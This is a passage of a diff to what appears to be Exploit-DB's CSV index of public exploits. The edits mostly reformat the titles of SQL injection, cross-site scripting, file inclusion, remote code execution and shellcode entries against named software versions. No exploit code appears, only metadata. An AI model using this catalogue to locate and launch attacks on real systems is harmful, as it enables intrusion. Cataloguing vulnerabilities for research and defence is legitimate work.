Scripting",2011-08-17,Ehsan_Hp200,php,webapps,0 36047,platforms/php/webapps/36047.txt,"awiki 20100125 - Multiple Local File Inclusion",2011-08-15,muuratsalo,php,webapps,0 36048,platforms/php/webapps/36048.txt,"PHPList 2.10.x - Security Bypass / Information Disclosure",2011-08-15,"Davide Canali",php,webapps,0 36049,platforms/windows/remote/36049.html,"StudioLine Photo Basic 3.70.34.0 - 'NMSDVDXU.dll' ActiveX Control Arbitrary File Overwrite",2011-08-17,"High-Tech Bridge SA",windows,remote,0 @@ -32518,8 +32518,8 @@ id,file,description,date,author,platform,type,port 36077,platforms/php/webapps/36077.txt,"Open Classifieds 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",php,webapps,0 36078,platforms/windows/remote/36078.py,"PCMan FTP Server 2.0.7 - Buffer Overflow MKD Command",2015-02-14,R-73eN,windows,remote,0 36079,platforms/php/webapps/36079.txt,"CommodityRentals Real Estate Script - 'txtsearch' Parameter HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0 -36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal 'hotel_city' Parameter HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0 -36081,platforms/php/webapps/36081.txt,"VicBlog 'tag' Parameter SQL Injection",2011-08-24,"Eyup CELIK",php,webapps,0 +36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal - 'hotel_city' Parameter HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0 +36081,platforms/php/webapps/36081.txt,"VicBlog - 'tag' Parameter SQL Injection",2011-08-24,"Eyup CELIK",php,webapps,0 36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 - 'filemanager/controller.php' Arbitrary File Upload",2011-08-25,KedAns-Dz,php,webapps,0 36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 - '[img]' BBCode Tag Cross Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps,0 36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0 @@ -32553,7 +32553,7 @@ id,file,description,date,author,platform,type,port 36113,platforms/php/webapps/36113.txt,"YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0 36114,platforms/php/webapps/36114.txt,"EasyGallery 5 - 'index.php' Multiple SQL Injection",2011-09-05,"Eyup CELIK",php,webapps,0 36115,platforms/windows/remote/36115.txt,"Apple QuickTime 7.6.9 - 'QuickTimePlayer.dll' ActiveX Buffer Overflow",2011-09-06,"Ivan Sanchez",windows,remote,0 -36116,platforms/asp/webapps/36116.txt,"Kisanji 'gr' Parameter Cross-Site Scripting",2011-09-06,Bl4ck.Viper,asp,webapps,0 +36116,platforms/asp/webapps/36116.txt,"Kisanji - 'gr' Parameter Cross-Site Scripting",2011-09-06,Bl4ck.Viper,asp,webapps,0 36117,platforms/php/webapps/36117.txt,"GeoClassifieds Lite 2.0.x Multiple Cross-Site Scripting and SQL Injection",2011-09-06,"Yassin Aboukir",php,webapps,0 36124,platforms/php/remote/36124.txt,"jQuery jui_filter_rules PHP Code Execution",2015-02-19,"Timo Schmid",php,remote,80 36121,platforms/php/webapps/36121.txt,"Zikula Application Framework 1.2.7/1.3 - 'themename' Parameter Cross-Site Scripting",2011-09-05,"High-Tech Bridge SA",php,webapps,0 @@ -32604,9 +32604,9 @@ id,file,description,date,author,platform,type,port 36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",php,webapps,0 36168,platforms/php/webapps/36168.txt,"Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0 36170,platforms/php/webapps/36170.txt,"PunBB 1.3.6 'browse.php' Cross-Site Scripting",2011-09-26,Amir,php,webapps,0 -36171,platforms/php/webapps/36171.txt,"Joomla! 'com_biitatemplateshop' Component 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0 +36171,platforms/php/webapps/36171.txt,"Joomla! 'com_biitatemplateshop' Component - 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0 36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0 -36173,platforms/php/webapps/36173.txt,"Vanira CMS 'vtpidshow' Parameter SQL Injection",2011-09-27,"kurdish hackers team",php,webapps,0 +36173,platforms/php/webapps/36173.txt,"Vanira CMS - 'vtpidshow' Parameter SQL Injection",2011-09-27,"kurdish hackers team",php,webapps,0 36174,platforms/windows/remote/36174.txt,"ServersCheck Monitoring Software 8.8.x Multiple Remote Security Vulnerabilities",2011-09-27,Vulnerability-Lab,windows,remote,0 36175,platforms/php/webapps/36175.txt,"Traq 2.2 - Multiple SQL Injection / Cross-Site Scripting",2011-09-28,"High-Tech Bridge SA",php,webapps,0 36176,platforms/php/webapps/36176.txt,"Joomla! 1.7.0 and Prior Multiple Cross-Site Scripting Vulnerabilities",2011-09-29,"Aung Khant",php,webapps,0 @@ -32650,14 +32650,14 @@ id,file,description,date,author,platform,type,port 36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0 36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Parameter Cross-Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps,0 36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,"cr4wl3r ",php,webapps,0 -36215,platforms/php/webapps/36215.txt,"Joomla! 'com_expedition' Component 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0 +36215,platforms/php/webapps/36215.txt,"Joomla! 'com_expedition' Component - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0 36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusion",2011-10-10,indoushka,php,webapps,0 36217,platforms/windows/remote/36217.txt,"GoAhead Webserver 2.18 addgroup.asp group Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0 36218,platforms/windows/remote/36218.txt,"GoAhead Webserver 2.18 addlimit.asp url Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0 36219,platforms/windows/remote/36219.txt,"GoAhead Webserver 2.18 adduser.asp Multiple Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0 -36220,platforms/php/webapps/36220.txt,"Joomla! 'com_tree' Component 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 -36221,platforms/php/webapps/36221.txt,"Joomla! 'com_br' Component 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 -36222,platforms/php/webapps/36222.txt,"Joomla! 'com_shop' Component 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 +36220,platforms/php/webapps/36220.txt,"Joomla! 'com_tree' Component - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 +36221,platforms/php/webapps/36221.txt,"Joomla! 'com_br' Component - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 +36222,platforms/php/webapps/36222.txt,"Joomla! 'com_shop' Component - 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusion",2011-10-11,indoushka,php,webapps,0 36224,platforms/php/webapps/36224.txt,"6KBBS 8.0 build 20101201 - Cross-Site Scripting / Information Disclosure",2011-10-10,"labs insight",php,webapps,0 36225,platforms/php/webapps/36225.txt,"Contao CMS 2.10.1 Cross-Site Scripting",2011-10-02,"Stefan Schurtz",php,webapps,0 @@ -32679,7 +32679,7 @@ id,file,description,date,author,platform,type,port 36241,platforms/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - LFI",2015-03-03,"Loudiyi Mohamed",hardware,webapps,0 36242,platforms/php/webapps/36242.txt,"WordPress Theme Photocrati 4.x.x - SQL Injection / XSS",2015-03-03,ayastar,php,webapps,0 36243,platforms/php/webapps/36243.txt,"WordPress cp-multi-view-calendar 1.1.4 Plugin - SQL Injection",2015-03-03,"i0akiN SEC-LABORATORY",php,webapps,0 -36246,platforms/multiple/remote/36246.txt,"Splunk 4.1.6 'segment' Parameter Cross-Site Scripting",2011-10-20,"Filip Palian",multiple,remote,0 +36246,platforms/multiple/remote/36246.txt,"Splunk 4.1.6 - 'segment' Parameter Cross-Site Scripting",2011-10-20,"Filip Palian",multiple,remote,0 36247,platforms/multiple/dos/36247.txt,"Splunk 4.1.6 Web component Remote Denial of Service",2011-10-20,"Filip Palian",multiple,dos,0 36248,platforms/php/webapps/36248.txt,"osCommerce - Remote File Upload / File Disclosure",2011-10-20,indoushka,php,webapps,0 36249,platforms/php/webapps/36249.txt,"Tine 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-20,"High-Tech Bridge SA",php,webapps,0 @@ -32689,7 +32689,7 @@ id,file,description,date,author,platform,type,port 36253,platforms/php/webapps/36253.txt,"InverseFlow 2.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-24,"Amir Expl0its",php,webapps,0 36254,platforms/php/webapps/36254.txt,"Alsbtain Bulletin 1.5/1.6 - Multiple Local File Inclusion",2011-10-25,"Null H4ck3r",php,webapps,0 36255,platforms/php/webapps/36255.txt,"vtiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-10-26,LiquidWorm,php,webapps,0 -36256,platforms/hardware/remote/36256.txt,"Multiple Cisco Products 'file' Parameter Directory Traversal",2011-10-26,"Sandro Gauci",hardware,remote,0 +36256,platforms/hardware/remote/36256.txt,"Multiple Cisco Products - 'file' Parameter Directory Traversal",2011-10-26,"Sandro Gauci",hardware,remote,0 36257,platforms/linux/local/36257.txt,"Trendmicro IWSS 3.1 - Local Privilege Escalation",2011-10-26,"Buguroo Offensive Security",linux,local,0 36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-26,Sangteamtham,windows,remote,0 36259,platforms/php/webapps/36259.txt,"eFront 3.6.10 - 'professor.php' Script Multiple SQL Injection",2011-10-28,"Vulnerability Research Laboratory",php,webapps,0 @@ -32707,7 +32707,7 @@ id,file,description,date,author,platform,type,port 36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS - (Little Endian) Chmod 666 /etc/shadow shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 36275,platforms/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 Cross-Site Scripting and Multiple Unspecified Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",jsp,webapps,0 36276,platforms/linux_mips/shellcode/36276.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/passwd shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 -36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) 'str' Parameter Cross-Site Scripting",2011-11-01,Isfahan,php,webapps,0 +36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) - 'str' Parameter Cross-Site Scripting",2011-11-01,Isfahan,php,webapps,0 36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0 36282,platforms/php/webapps/36282.txt,"eFront 3.6.x Multiple Cross-Site Scripting and SQL Injection",2011-11-02,"High-Tech Bridge SA",php,webapps,0 36283,platforms/php/webapps/36283.txt,"Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Parameter Cross-Site Scripting",2011-11-03,"Stefan Schurtz",php,webapps,0 @@ -32718,7 +32718,7 @@ id,file,description,date,author,platform,type,port 36286,platforms/hardware/remote/36286.txt,"DreamBox DM800 - 'file' Parameter Local File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0 36287,platforms/php/webapps/36287.txt,"WordPress Bonus Theme 1.0 - 's' Parameter Cross-Site Scripting",2011-11-04,3spi0n,php,webapps,0 36288,platforms/multiple/dos/36288.php,"Multiple Vendors libc 'regcomp()' Stack Exhaustion Denial Of Service",2011-11-04,"Maksymilian Arciemowicz",multiple,dos,0 -36289,platforms/php/webapps/36289.txt,"SmartJobBoard 'keywords' Parameter Cross-Site Scripting",2011-11-07,Mr.PaPaRoSSe,php,webapps,0 +36289,platforms/php/webapps/36289.txt,"SmartJobBoard - 'keywords' Parameter Cross-Site Scripting",2011-11-07,Mr.PaPaRoSSe,php,webapps,0 36290,platforms/php/webapps/36290.txt,"Admin Bot 'news.php' SQL Injection",2011-11-07,baltazar,php,webapps,0 36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 - 'PHP_SELF' Variable Multiple Cross-Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0 36292,platforms/java/webapps/36292.txt,"Oracle NoSQL 11g 1.1.100 R2 - 'log' Parameter Directory Traversal",2011-11-07,Buherátor,java,webapps,0 @@ -32731,13 +32731,13 @@ id,file,description,date,author,platform,type,port 36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0 36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 - '.ogg' File Buffer Overflow",2011-11-11,swami,windows,dos,0 36301,platforms/php/webapps/36301.txt,"WordPress Download Manager 2.7.2 Plugin - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0 -36302,platforms/php/webapps/36302.txt,"Joomla Content Component 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0 +36302,platforms/php/webapps/36302.txt,"Joomla Content Component - 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0 36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",php,webapps,80 36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 Remote Command Execution",2015-03-06,Metasploit,windows,remote,5555 36305,platforms/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection",2015-03-07,"Ahmed Aboul-Ela",php,webapps,0 36306,platforms/php/webapps/36306.txt,"PHP Betoffice (Betster) 1.0.4 - Authentication Bypass / SQL Injection",2015-03-06,ZeQ3uL,php,webapps,0 36307,platforms/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 admin_index.php SITE_NAME Parameter XSS",2011-11-13,"Gjoko Krstic",php,webapps,0 -36308,platforms/php/webapps/36308.txt,"Webistry 1.6 'pid' Parameter SQL Injection",2011-11-16,CoBRa_21,php,webapps,0 +36308,platforms/php/webapps/36308.txt,"Webistry 1.6 - 'pid' Parameter SQL Injection",2011-11-16,CoBRa_21,php,webapps,0 36309,platforms/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash PoC",2015-03-08,"Loudiyi Mohamed",hardware,dos,0 36310,platforms/lin_x86-64/local/36310.txt,"Rowhammer Linux Kernel - Privilege Escalation PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0 36311,platforms/lin_x86-64/local/36311.txt,"Rowhammer: NaCl Sandbox Escape PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0 @@ -32791,7 +32791,7 @@ id,file,description,date,author,platform,type,port 36360,platforms/windows/remote/36360.rb,"Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free",2015-03-12,Metasploit,windows,remote,0 36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 - 'APPE' Command Remote Denial Of Service",2011-11-25,"Houssam Sahli",windows,dos,0 36362,platforms/php/webapps/36362.txt,"eSyndiCat Pro 2.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-26,d3v1l,php,webapps,0 -36363,platforms/php/webapps/36363.txt,"WordPress Skysa App Bar Plugin 'idnews' Parameter Cross-Site Scripting",2011-11-28,Amir,php,webapps,0 +36363,platforms/php/webapps/36363.txt,"WordPress Skysa App Bar Plugin - 'idnews' Parameter Cross-Site Scripting",2011-11-28,Amir,php,webapps,0 36364,platforms/php/webapps/36364.txt,"Manx 1.0.1 admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php Multiple Parameter XSS",2011-11-28,LiquidWorm,php,webapps,0 36365,platforms/php/webapps/36365.txt,"Manx 1.0.1 admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php Multiple Parameter XSS",2011-11-28,LiquidWorm,php,webapps,0 36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 - /admin/admin_blocks.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 @@ -32890,16 +32890,16 @@ id,file,description,date,author,platform,type,port 36459,platforms/cgi/webapps/36459.txt,"Websense 7.6 Products 'favorites.exe' Authentication Bypass",2011-12-15,"Ben Williams",cgi,webapps,0 36460,platforms/php/webapps/36460.txt,"Flirt-Projekt 4.8 - 'rub' Parameter SQL Injection",2011-12-17,Lazmania61,php,webapps,0 36461,platforms/php/webapps/36461.txt,"Social Network Community 2 - 'userID' Parameter SQL Injection",2011-12-17,Lazmania61,php,webapps,0 -36462,platforms/php/webapps/36462.txt,"Video Community Portal 'userID' Parameter SQL Injection",2011-12-18,Lazmania61,php,webapps,0 +36462,platforms/php/webapps/36462.txt,"Video Community Portal - 'userID' Parameter SQL Injection",2011-12-18,Lazmania61,php,webapps,0 36463,platforms/php/webapps/36463.txt,"Telescope 0.9.2 - Markdown Persistent XSS",2015-03-21,shubs,php,webapps,0 36464,platforms/php/webapps/36464.txt,"Joomla Spider FAQ Component - SQL Injection",2015-03-22,"Manish Tanwar",php,webapps,0 36465,platforms/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - Local Buffer Overflow",2015-03-22,"TUNISIAN CYBER",windows,local,0 36466,platforms/php/webapps/36466.txt,"WordPress Marketplace 2.4.0 Plugin - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0 -36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e 'page_info_message' Parameter Cross-Site Scripting",2011-12-19,G13,php,webapps,0 -36469,platforms/php/webapps/36469.txt,"Joomla! 'com_tsonymf' Component 'idofitem' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0 +36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e - 'page_info_message' Parameter Cross-Site Scripting",2011-12-19,G13,php,webapps,0 +36469,platforms/php/webapps/36469.txt,"Joomla! 'com_tsonymf' Component - 'idofitem' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0 36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware 8.1 - 'show_errors' Parameter HTML Injection",2011-12-20,"Stefan Schurtz",php,webapps,0 36471,platforms/php/webapps/36471.txt,"PHPShop CMS 3.4 - Multiple Cross-Site Scripting and SQL Injection",2011-12-20,"High-Tech Bridge SA",php,webapps,0 -36472,platforms/php/webapps/36472.txt,"Joomla! 'com_caproductprices' Component 'id' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0 +36472,platforms/php/webapps/36472.txt,"Joomla! 'com_caproductprices' Component - 'id' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0 36473,platforms/php/webapps/36473.txt,"Cyberoam UTM 10 - 'tableid' Parameter SQL Injection",2011-12-20,"Benjamin Kunz Mejri",php,webapps,0 36474,platforms/php/webapps/36474.txt,"epesi BIM 1.2 rev 8154 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-21,"High-Tech Bridge SA",php,webapps,0 36475,platforms/hardware/remote/36475.txt,"Barracuda Control Center 620 - Cross-Site Scripting / HTML Injection",2011-12-21,Vulnerability-Lab,hardware,remote,0 @@ -32912,7 +32912,7 @@ id,file,description,date,author,platform,type,port 36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Parameter Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0 36490,platforms/php/webapps/36490.py,"WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0 36491,platforms/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0 -36492,platforms/php/webapps/36492.txt,"GraphicsClone Script 'term' parameter Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0 +36492,platforms/php/webapps/36492.txt,"GraphicsClone Script - 'term' parameter Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0 36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 - 'ReturnUrl' Parameter URI Redirection",2012-01-04,"Mesut Timur",php,webapps,0 36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross-Site Scripting",2012-01-04,"Gjoko Krstic",php,webapps,0 36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 - 'status' Parameter SQL Injection",2011-12-29,SiteWatch,php,webapps,0 @@ -32998,22 +32998,22 @@ id,file,description,date,author,platform,type,port 36580,platforms/windows/webapps/36580.rb,"Palo Alto Traps Server 3.1.2.1546 - Persistent XSS",2015-03-31,"Michael Hendrickx",windows,webapps,0 36581,platforms/php/webapps/36581.txt,"Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities",2015-03-31,Mahendra,php,webapps,80 36582,platforms/php/webapps/36582.txt,"OneOrZero AIMS 'index.php' Cross-Site Scripting",2012-01-18,"High-Tech Bridge SA",php,webapps,0 -36583,platforms/php/webapps/36583.txt,"PostNuke pnAddressbook Module 'id' Parameter SQL Injection",2012-01-19,"Robert Cooper",php,webapps,0 +36583,platforms/php/webapps/36583.txt,"PostNuke pnAddressbook Module - 'id' Parameter SQL Injection",2012-01-19,"Robert Cooper",php,webapps,0 36584,platforms/php/webapps/36584.txt,"Vastal EzineShop 'view_mags.php' SQL Injection",2012-01-19,Lazmania61,php,webapps,0 36585,platforms/asp/webapps/36585.txt,"Snitz Forums 2000 - 'TOPIC_ID' Parameter SQL Injection",2012-01-20,snup,asp,webapps,0 36586,platforms/php/webapps/36586.txt,"Syneto Unified Threat Management 1.3.3/1.4.2 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-01-20,"Alexander Fuchs",php,webapps,0 36587,platforms/windows/remote/36587.py,"Savant Web Server 3.1 Remote Buffer Overflow",2012-01-21,red-dragon,windows,remote,0 36588,platforms/asp/webapps/36588.txt,"Acidcat ASP CMS 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-21,"Avram Marius",asp,webapps,0 -36589,platforms/php/webapps/36589.txt,"Joomla! 'com_br' Component 'controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0 +36589,platforms/php/webapps/36589.txt,"Joomla! 'com_br' Component - 'controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0 36590,platforms/php/webapps/36590.txt,"Tribiq CMS 'index.php' SQL Injection",2012-01-21,"Skote Vahshat",php,webapps,0 -36591,platforms/php/webapps/36591.txt,"Joomla! Full 'com_full' Component 'id' Parameter SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36591,platforms/php/webapps/36591.txt,"Joomla! Full 'com_full' Component - 'id' Parameter SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0 36592,platforms/php/webapps/36592.txt,"Joomla 'com_sanpham' Component Multiple SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0 -36593,platforms/php/webapps/36593.txt,"Joomla! 'com_xball' Component 'team_id' Parameter SQL Injection",2012-01-23,CoBRa_21,php,webapps,0 -36594,platforms/php/webapps/36594.txt,"Joomla! 'com_boss' Component 'controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36593,platforms/php/webapps/36593.txt,"Joomla! 'com_xball' Component - 'team_id' Parameter SQL Injection",2012-01-23,CoBRa_21,php,webapps,0 +36594,platforms/php/webapps/36594.txt,"Joomla! 'com_boss' Component - 'controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 36595,platforms/php/webapps/36595.txt,"Joomla 'com_car' Component Multiple SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0 -36596,platforms/php/webapps/36596.txt,"Joomla! 'com_some' Component 'controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 -36597,platforms/php/webapps/36597.txt,"Joomla! 'com_bulkenquery' Component 'controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 -36598,platforms/php/webapps/36598.txt,"Joomla! 'com_kp' Component 'controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36596,platforms/php/webapps/36596.txt,"Joomla! 'com_some' Component - 'controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36597,platforms/php/webapps/36597.txt,"Joomla! 'com_bulkenquery' Component - 'controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36598,platforms/php/webapps/36598.txt,"Joomla! 'com_kp' Component - 'controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 36599,platforms/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload",2012-01-21,HELLBOY,asp,webapps,0 36600,platforms/php/webapps/36600.txt,"WordPress Business Intelligence Plugin - SQL injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80 36601,platforms/php/webapps/36601.txt,"Joomla Spider Random Article Component - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80 @@ -33036,29 +33036,29 @@ id,file,description,date,author,platform,type,port 36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0 36621,platforms/php/webapps/36621.txt,"glFusion 1.x SQL Injection",2012-01-24,KedAns-Dz,php,webapps,0 36622,platforms/windows/dos/36622.pl,"UltraPlayer 2.112 Malformed '.avi' File Denial of Service",2012-01-24,KedAns-Dz,windows,dos,0 -36623,platforms/php/webapps/36623.txt,"Ultimate Locator 'radius' Parameter SQL Injection",2012-01-24,"Robert Cooper",php,webapps,0 -36624,platforms/php/webapps/36624.txt,"Joomla! 'com_jesubmit' Component 'index.php' Arbitrary File Upload",2012-01-24,"Robert Cooper",php,webapps,0 +36623,platforms/php/webapps/36623.txt,"Ultimate Locator - 'radius' Parameter SQL Injection",2012-01-24,"Robert Cooper",php,webapps,0 +36624,platforms/php/webapps/36624.txt,"Joomla! 'com_jesubmit' Component - 'index.php' Arbitrary File Upload",2012-01-24,"Robert Cooper",php,webapps,0 36625,platforms/php/webapps/36625.txt,"OSClass 2.3.3 index.php sCategory Parameter SQL Injection",2012-01-25,"High-Tech Bridge SA",php,webapps,0 36626,platforms/php/webapps/36626.txt,"OSClass 2.3.3 index.php getParam() Function Multiple Parameter XSS",2012-01-25,"High-Tech Bridge SA",php,webapps,0 36627,platforms/php/webapps/36627.txt,"DClassifieds 0.1 final Cross Site Request Forgery",2012-01-25,"High-Tech Bridge SA",php,webapps,0 36628,platforms/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Inclusion",2012-01-25,PacketiK,php,webapps,0 -36629,platforms/php/webapps/36629.txt,"Joomla! 'com_motor' Component 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0 +36629,platforms/php/webapps/36629.txt,"Joomla! 'com_motor' Component - 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0 36630,platforms/php/webapps/36630.txt,"Joomla 'com_products' Component Multiple SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0 36631,platforms/php/webapps/36631.txt,"WordPress Slideshow Gallery Plugin 1.1.x - 'border' Parameter Cross-Site Scripting",2012-01-26,"Bret Hawk",php,webapps,0 36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x - 'shopping_url' Parameter Cross-Site Scripting",2012-01-26,sonyy,php,webapps,0 36633,platforms/linux/dos/36633.txt,"Wireshark - Buffer Underflow / Denial of Service",2012-01-10,"Laurent Butti",linux,dos,0 36634,platforms/php/webapps/36634.txt,"Joomla! 'com_visa' Component Local File Inclusion and SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0 -36635,platforms/php/webapps/36635.txt,"Joomla! 'com_firmy' Component 'Id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0 +36635,platforms/php/webapps/36635.txt,"Joomla! 'com_firmy' Component - 'Id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0 36637,platforms/lin_x86/shellcode/36637.c,"Linux/x86 - Disable ASLR shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0 -36638,platforms/php/webapps/36638.txt,"Joomla! 'com_crhotels' Component 'catid' Parameter SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps,0 -36639,platforms/php/webapps/36639.txt,"Joomla! 'com_propertylab' Component 'id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0 +36638,platforms/php/webapps/36638.txt,"Joomla! 'com_crhotels' Component - 'catid' Parameter SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps,0 +36639,platforms/php/webapps/36639.txt,"Joomla! 'com_propertylab' Component - 'id' 